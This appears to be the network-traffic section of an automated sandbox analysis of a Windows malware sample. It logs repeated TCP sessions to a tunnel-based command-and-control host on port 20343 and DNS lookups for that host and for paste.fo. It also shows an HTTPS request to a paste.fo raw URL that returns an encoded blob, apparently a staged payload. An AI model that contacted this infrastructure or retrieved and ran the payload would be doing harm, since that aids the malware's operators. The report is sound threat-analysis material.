Aug 8, 2024 02:37:19.310761929 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:20.645476103 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:20.650861979 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:24.161261082 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:24.166687012 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:24.817415953 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:24.837595940 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:26.645503044 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:26.650785923 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:35.395586014 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:35.401371002 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:39.553999901 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:39.559753895 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:40.383708954 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:40.383795023 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:44.551465034 CEST	49743	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:44.557008028 CEST	20343	49743	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:44.557835102 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:44.564554930 CEST	20343	49744	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:44.564629078 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:44.606161118 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:44.610914946 CEST	20343	49744	147.185.221.16	192.168.2.4
Aug 8, 2024 02:37:53.473609924 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:37:53.478686094 CEST	20343	49744	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:05.966955900 CEST	20343	49744	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:05.967111111 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:10.035933971 CEST	49744	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:10.041105986 CEST	20343	49744	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:10.043289900 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:10.048877001 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:10.048970938 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:10.096297026 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:10.101852894 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:20.239388943 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:20.244415998 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:20.255114079 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:20.260452032 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:20.286277056 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:20.291503906 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:20.333023071 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:20.338212013 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:20.395731926 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:20.401077032 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:26.582948923 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:26.588355064 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:31.418616056 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:31.418723106 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.552031994 CEST	49745	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.557674885 CEST	20343	49745	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:35.600383043 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.605916977 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:35.606029034 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.664263010 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.672635078 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:35.754786015 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:35.760046959 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:36.849044085 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:36.854626894 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:40.864389896 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:40.869956970 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:40.942393064 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:40.948041916 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:40.958134890 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:40.963480949 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.020468950 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.026542902 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.036175013 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.041132927 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.145818949 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.151103020 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.161236048 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.166357040 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.192459106 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.197916985 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:41.239301920 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:41.244887114 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:51.270566940 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:38:51.276165962 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:56.979634047 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:38:56.979851007 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:01.350532055 CEST	49746	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:01.356179953 CEST	20343	49746	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:01.362129927 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:01.367858887 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:01.368012905 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:01.427769899 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:01.433238983 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:03.098787069 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:03.104165077 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:06.927217007 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:06.932713032 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:18.947268009 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:18.952621937 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:22.730789900 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:22.731257915 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:27.098586082 CEST	49747	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:27.103668928 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:27.103996992 CEST	20343	49747	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:27.109141111 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:27.109328985 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:27.160307884 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:27.165425062 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:40.631170034 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:40.637993097 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:42.911227942 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:42.916847944 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:44.162189960 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:44.167587042 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:44.461373091 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:44.468125105 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:44.833352089 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:45.051547050 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:45.056802034 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:45.058475018 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:46.585501909 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:46.590909004 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:46.770541906 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:46.780005932 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:48.466545105 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:48.473171949 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.004923105 CEST	49748	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.010464907 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.010540962 CEST	20343	49748	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.015652895 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.015850067 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.052258015 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.057212114 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.083250046 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.090679884 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.130085945 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.135382891 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.161791086 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.166975021 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.271959066 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.277009964 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:53.364308119 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:53.369699955 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:39:54.145683050 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:39:54.151221991 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:05.708097935 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:05.713519096 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:06.098608971 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:06.105479956 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:14.435059071 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:14.435314894 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:20.223577023 CEST	49749	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:20.224728107 CEST	49750	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:20.228650093 CEST	20343	49749	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:20.229650974 CEST	20343	49750	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:20.229748011 CEST	49750	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:20.252666950 CEST	49750	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:20.257510900 CEST	20343	49750	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:34.459342957 CEST	49750	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:40:34.464875937 CEST	20343	49750	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:41.606859922 CEST	20343	49750	147.185.221.16	192.168.2.4
Aug 8, 2024 02:40:41.606996059 CEST	49750	20343	192.168.2.4	147.185.221.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2024 02:36:00.800692081 CEST	60813	53	192.168.2.4	1.1.1.1
Aug 8, 2024 02:36:00.813788891 CEST	53	60813	1.1.1.1	192.168.2.4
Aug 8, 2024 02:36:06.168222904 CEST	51533	53	192.168.2.4	1.1.1.1
Aug 8, 2024 02:36:06.181755066 CEST	53	51533	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 8, 2024 02:36:00.800692081 CEST	192.168.2.4	1.1.1.1	0xb0bd	Standard query (0)	paste.fo	A (IP address)	IN (0x0001)	false
Aug 8, 2024 02:36:06.168222904 CEST	192.168.2.4	1.1.1.1	0xbeb	Standard query (0)	cameras-commitment.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 8, 2024 02:36:00.813788891 CEST	1.1.1.1	192.168.2.4	0xb0bd	No error (0)	paste.fo	104.21.28.76	A (IP address)	IN (0x0001)	false
Aug 8, 2024 02:36:00.813788891 CEST	1.1.1.1	192.168.2.4	0xb0bd	No error (0)	paste.fo	172.67.144.225	A (IP address)	IN (0x0001)	false
Aug 8, 2024 02:36:06.181755066 CEST	1.1.1.1	192.168.2.4	0xbeb	No error (0)	cameras-commitment.gl.at.ply.gg	147.185.221.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.fo

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.28.76	443	6872	C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-08 00:36:01 UTC	73	OUT	GET /raw/9c15a0ff5499 HTTP/1.1 User-Agent: WebReader Host: paste.fo
2024-08-08 00:36:01 UTC	834	IN	HTTP/1.1 200 OK Date: Thu, 08 Aug 2024 00:36:01 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e6dnf9kqraq7evsug8ep2l8pp2; path=/ Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXgM4SyJ0IwHYtOjtQvbmlq8%2Be68RqmWe6OGSjD3t6793AYTuL2ocQk9t4kjEhdl%2Bx07f07ycixT4G6QIFhJSkVtzO8xF5Xn3MBCaqzLPxrUSuiQbwfLBSPUrg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8afb6e04fb9317e9-EWR alt-svc: h3=":443"; ma=86400
2024-08-08 00:36:01 UTC	535	IN	Data Raw: 34 37 66 64 0d 0a 68 51 52 54 45 6f 7a 32 74 6a 51 4d 57 7a 67 2f 6b 6a 52 5a 58 4e 67 37 59 42 77 66 69 38 2f 46 54 62 4f 62 76 55 2f 61 31 59 35 2b 30 42 2b 34 74 48 54 65 43 58 39 62 6d 34 71 50 4c 44 68 7a 63 53 56 47 32 65 54 71 53 74 36 59 56 78 75 6f 6c 35 2b 6b 4b 38 39 44 44 66 62 62 53 50 35 61 6b 77 47 6e 50 68 5a 65 45 51 7a 50 37 73 78 59 47 4c 56 52 2b 76 59 7a 31 4e 67 44 68 58 55 45 6d 58 6f 59 33 63 6b 6f 39 33 6c 6f 6b 42 64 46 67 35 53 55 41 73 39 53 59 6b 79 52 34 38 4a 2b 73 4c 59 6f 34 30 73 4a 65 5a 45 45 6a 68 4a 78 47 66 43 47 43 41 65 62 72 72 73 49 30 76 32 75 4e 2f 6a 4f 4a 72 67 46 68 56 77 34 4b 46 73 59 6c 5a 69 35 74 76 65 72 53 73 67 54 6a 31 51 34 44 6b 78 52 63 43 2f 5a 65 74 30 69 46 76 4f 57 58 34 68 52 4f 65 65 6a 42 Data Ascii: 47fdhQRTEoz2tjQMWzg/kjRZXNg7YBwfi8/FTbObvU/a1Y5+0B+4tHTeCX9bm4qPLDhzcSVG2eTqSt6YVxuol5+kK89DDfbbSP5akwGnPhZeEQzP7sxYGLVR+vYz1NgDhXUEmXoY3cko93lokBdFg5SUAs9SYkyR48J+sLYo40sJeZEEjhJxGfCGCAebrrsI0v2uN/jOJrgFhVw4KFsYlZi5tverSsgTj1Q4DkxRcC/Zet0iFvOWX4hROeejB
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 53 63 72 30 5a 4f 65 78 4a 44 2b 35 75 71 57 73 52 67 38 65 4e 30 72 47 51 61 61 78 47 70 4a 2b 51 37 30 59 74 71 79 52 51 43 46 56 58 4b 77 6d 39 63 44 59 47 35 39 61 6a 69 79 6a 4e 78 54 50 6f 6a 45 32 34 39 48 65 55 59 6a 65 31 52 31 53 72 74 73 55 53 78 32 63 66 32 65 2f 38 78 30 46 33 74 6a 6e 37 36 6b 76 4a 54 70 32 43 58 4f 57 69 30 75 57 4c 4b 53 2b 32 44 67 44 4b 43 50 47 48 41 4b 54 71 59 6b 62 58 33 58 77 38 36 33 72 53 6c 6d 68 57 73 63 64 71 4e 5a 35 76 5a 31 2f 71 6a 7a 37 67 32 65 71 6e 59 5a 70 41 46 6c 6e 42 78 50 43 31 6e 6f 31 42 43 4c 65 71 63 59 78 54 56 53 76 76 55 32 57 6b 78 30 42 6b 6f 4f 5a 43 59 7a 47 65 6f 6d 66 5a 6e 7a 7a 31 4a 6d 43 72 58 6e 57 62 57 4f 34 4e 31 65 38 63 5a 73 52 42 4a 41 53 38 56 79 4e 6a 77 33 2f 59 4d 52 Data Ascii: Scr0ZOexJD+5uqWsRg8eN0rGQaaxGpJ+Q70YtqyRQCFVXKwm9cDYG59ajiyjNxTPojE249HeUYje1R1SrtsUSx2cf2e/8x0F3tjn76kvJTp2CXOWi0uWLKS+2DgDKCPGHAKTqYkbX3Xw863rSlmhWscdqNZ5vZ1/qjz7g2eqnYZpAFlnBxPC1no1BCLeqcYxTVSvvU2Wkx0BkoOZCYzGeomfZnzz1JmCrXnWbWO4N1e8cZsRBJAS8VyNjw3/YMR
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 6f 35 4a 2f 49 62 2b 56 49 6a 61 2b 71 53 4f 67 4c 6c 61 33 75 37 65 32 48 46 49 50 7a 77 32 4e 7a 36 4d 46 47 5a 6c 58 4e 77 52 61 6c 52 48 6b 6a 45 77 6e 2f 47 37 6b 77 45 75 4f 6a 4c 58 76 32 2f 34 47 4a 79 38 31 30 5a 53 51 70 4d 44 76 47 7a 2f 4a 52 45 47 72 77 58 33 4f 66 38 5a 59 6f 6d 73 42 2f 71 32 4a 68 4f 34 4b 37 34 58 61 45 30 57 30 4b 4c 35 61 6a 5a 67 35 66 64 55 49 6c 71 6a 4f 64 67 30 6c 6e 30 31 4d 35 53 5a 6b 49 38 61 5a 54 73 71 74 79 30 2f 38 4a 46 67 49 31 36 38 73 47 55 53 53 6e 4b 4a 37 47 38 51 64 71 31 67 43 6f 67 36 63 69 69 4d 62 74 2f 36 37 6d 52 30 37 7a 65 34 57 6a 71 50 42 38 45 69 38 37 73 45 35 58 49 46 67 79 49 68 57 76 71 56 67 4e 56 74 2f 37 4d 53 57 6c 4b 41 4b 6e 46 69 66 59 50 4a 4a 6a 73 6a 63 45 72 46 59 5a 51 56 Data Ascii: o5J/Ib+VIja+qSOgLla3u7e2HFIPzw2Nz6MFGZlXNwRalRHkjEwn/G7kwEuOjLXv2/4GJy810ZSQpMDvGz/JREGrwX3Of8ZYomsB/q2JhO4K74XaE0W0KL5ajZg5fdUIlqjOdg0ln01M5SZkI8aZTsqty0/8JFgI168sGUSSnKJ7G8Qdq1gCog6ciiMbt/67mR07ze4WjqPB8Ei87sE5XIFgyIhWvqVgNVt/7MSWlKAKnFifYPJJjsjcErFYZQV
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 38 4a 79 65 69 71 6c 33 31 4e 37 32 4e 64 34 38 65 61 41 4b 62 44 2b 5a 53 4a 30 4f 57 6a 61 63 75 63 65 34 65 39 4e 64 41 66 52 51 70 47 30 69 33 55 78 71 4e 37 57 74 45 30 56 34 5a 50 73 38 43 53 36 68 2b 2b 44 35 6e 6c 61 73 4e 79 76 64 33 68 51 45 76 34 34 67 4f 58 43 70 71 76 66 6d 42 71 2f 56 79 41 48 6a 48 66 31 4e 66 4c 47 34 54 61 57 4e 42 7a 44 6c 4c 6f 35 49 2f 6f 31 73 67 48 36 5a 6b 79 4d 52 50 41 45 30 38 4a 63 53 5a 65 41 61 5a 36 67 35 70 53 75 54 34 54 79 34 47 6d 2b 36 4f 55 33 31 59 4b 37 50 6f 2f 30 4c 67 69 6a 37 55 73 56 46 31 55 55 38 73 49 69 41 43 6a 75 6b 4e 47 37 5a 34 66 50 52 71 37 35 42 5a 49 47 77 68 61 66 49 69 6d 50 6b 6d 70 63 53 36 74 66 6d 7a 75 66 61 63 77 6a 43 6f 32 74 39 53 41 59 4c 33 72 69 54 64 32 44 66 36 37 57 Data Ascii: 8Jyeiql31N72Nd48eaAKbD+ZSJ0OWjacuce4e9NdAfRQpG0i3UxqN7WtE0V4ZPs8CS6h++D5nlasNyvd3hQEv44gOXCpqvfmBq/VyAHjHf1NfLG4TaWNBzDlLo5I/o1sgH6ZkyMRPAE08JcSZeAaZ6g5pSuT4Ty4Gm+6OU31YK7Po/0Lgij7UsVF1UU8sIiACjukNG7Z4fPRq75BZIGwhafIimPkmpcS6tfmzufacwjCo2t9SAYL3riTd2Df67W
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 7a 65 49 5a 6b 38 63 4e 74 55 78 72 45 62 39 6f 32 42 63 73 41 36 50 51 54 58 6e 59 7a 57 79 6a 6d 58 51 76 49 38 58 62 6a 30 42 51 62 4b 66 62 48 5a 74 65 32 36 44 56 47 31 5a 51 67 4c 43 59 66 61 63 4d 2f 31 34 38 79 6e 59 57 65 4b 63 64 73 55 53 59 6c 4c 54 6f 51 7a 47 61 49 49 69 73 4e 2f 50 66 33 45 50 41 41 69 53 68 54 44 6e 54 6c 4a 4c 45 50 57 6a 68 63 64 4b 4a 53 68 57 64 34 78 52 6d 56 36 4c 49 66 73 55 64 66 58 64 6c 30 65 66 63 73 62 64 7a 54 2f 65 4d 38 46 59 6d 42 65 58 66 69 45 72 5a 4e 58 50 41 6c 52 52 6f 64 75 52 31 34 35 55 4f 53 30 70 54 78 2b 6b 56 53 49 56 46 6b 6f 6d 59 33 46 2b 72 45 63 57 77 65 39 62 68 61 49 2b 32 71 34 78 6b 53 59 7a 52 55 58 34 68 75 33 63 61 54 2b 35 35 2b 45 6f 72 49 70 44 32 53 76 59 36 75 4e 37 39 39 71 4f Data Ascii: zeIZk8cNtUxrEb9o2BcsA6PQTXnYzWyjmXQvI8Xbj0BQbKfbHZte26DVG1ZQgLCYfacM/148ynYWeKcdsUSYlLToQzGaIIisN/Pf3EPAAiShTDnTlJLEPWjhcdKJShWd4xRmV6LIfsUdfXdl0efcsbdzT/eM8FYmBeXfiErZNXPAlRRoduR145UOS0pTx+kVSIVFkomY3F+rEcWwe9bhaI+2q4xkSYzRUX4hu3caT+55+EorIpD2SvY6uN799qO
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 6b 34 4b 48 62 68 70 50 4b 6c 37 35 79 77 55 45 4a 78 6f 4b 43 64 35 43 42 74 65 66 35 5a 6c 5a 56 46 63 42 31 62 68 4d 76 58 39 62 47 37 6d 49 47 42 47 4e 36 2b 44 39 34 75 67 72 64 6b 53 32 52 69 4f 31 64 69 4a 37 2b 47 72 70 71 41 49 37 4d 45 35 79 42 58 63 74 62 6d 55 66 39 32 70 57 39 54 6a 79 73 69 4b 4d 5a 5a 33 46 55 51 6c 4f 75 4c 31 4a 68 57 79 41 6e 35 31 38 6a 76 32 31 6c 64 4b 6a 6f 48 73 41 75 79 4f 4e 65 33 78 6c 65 43 75 54 41 61 64 45 50 2f 61 41 58 64 6e 45 64 32 55 4d 54 73 4f 74 4f 75 33 4a 41 45 30 47 71 64 6e 73 66 4c 42 47 43 50 71 50 77 59 2b 6a 59 4e 74 6c 53 4d 69 6b 6f 6d 36 78 58 51 53 54 6f 4c 66 72 67 33 56 4d 6c 55 2b 39 51 73 54 33 6e 50 35 47 7a 78 31 4a 76 57 66 37 2f 56 68 6a 5a 57 32 31 4c 56 43 61 45 75 77 4f 64 4a 4d Data Ascii: k4KHbhpPKl75ywUEJxoKCd5CBtef5ZlZVFcB1bhMvX9bG7mIGBGN6+D94ugrdkS2RiO1diJ7+GrpqAI7ME5yBXctbmUf92pW9TjysiKMZZ3FUQlOuL1JhWyAn518jv21ldKjoHsAuyONe3xleCuTAadEP/aAXdnEd2UMTsOtOu3JAE0GqdnsfLBGCPqPwY+jYNtlSMikom6xXQSToLfrg3VMlU+9QsT3nP5Gzx1JvWf7/VhjZW21LVCaEuwOdJM
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 6f 48 45 76 5a 33 51 64 72 53 42 64 68 7a 2f 63 32 33 52 34 37 2f 44 6f 56 55 67 71 4b 4e 4e 50 4f 4d 74 64 62 75 2b 6a 59 43 67 52 30 52 6d 6e 56 48 4a 53 49 61 34 68 2b 70 53 4e 50 50 43 72 73 79 35 66 6b 43 7a 61 39 61 35 30 4e 30 6c 32 46 69 4c 57 58 4e 73 73 55 39 2f 4f 38 58 63 44 69 61 68 50 56 52 33 52 57 44 56 4c 50 38 77 2f 31 69 6a 73 6a 4c 4f 4a 65 70 74 47 44 75 6f 52 2b 67 51 64 5a 54 4f 59 38 73 55 5a 36 42 32 57 6e 4f 62 49 4f 4c 72 4a 57 6e 51 4c 54 78 39 71 56 65 76 4d 56 36 42 4e 64 67 30 67 6c 79 64 76 37 6f 5a 55 31 44 73 51 77 2b 55 49 74 2b 34 4b 66 79 31 52 46 5a 75 4b 72 31 64 76 52 37 4b 67 54 4b 75 57 75 64 6a 72 6a 52 64 71 73 39 68 2f 55 4f 53 44 36 35 37 6d 41 73 58 42 37 32 2b 45 62 71 43 41 52 54 56 68 64 64 41 4a 79 74 57 Data Ascii: oHEvZ3QdrSBdhz/c23R47/DoVUgqKNNPOMtdbu+jYCgR0RmnVHJSIa4h+pSNPPCrsy5fkCza9a50N0l2FiLWXNssU9/O8XcDiahPVR3RWDVLP8w/1ijsjLOJeptGDuoR+gQdZTOY8sUZ6B2WnObIOLrJWnQLTx9qVevMV6BNdg0glydv7oZU1DsQw+UIt+4Kfy1RFZuKr1dvR7KgTKuWudjrjRdqs9h/UOSD657mAsXB72+EbqCARTVhddAJytW
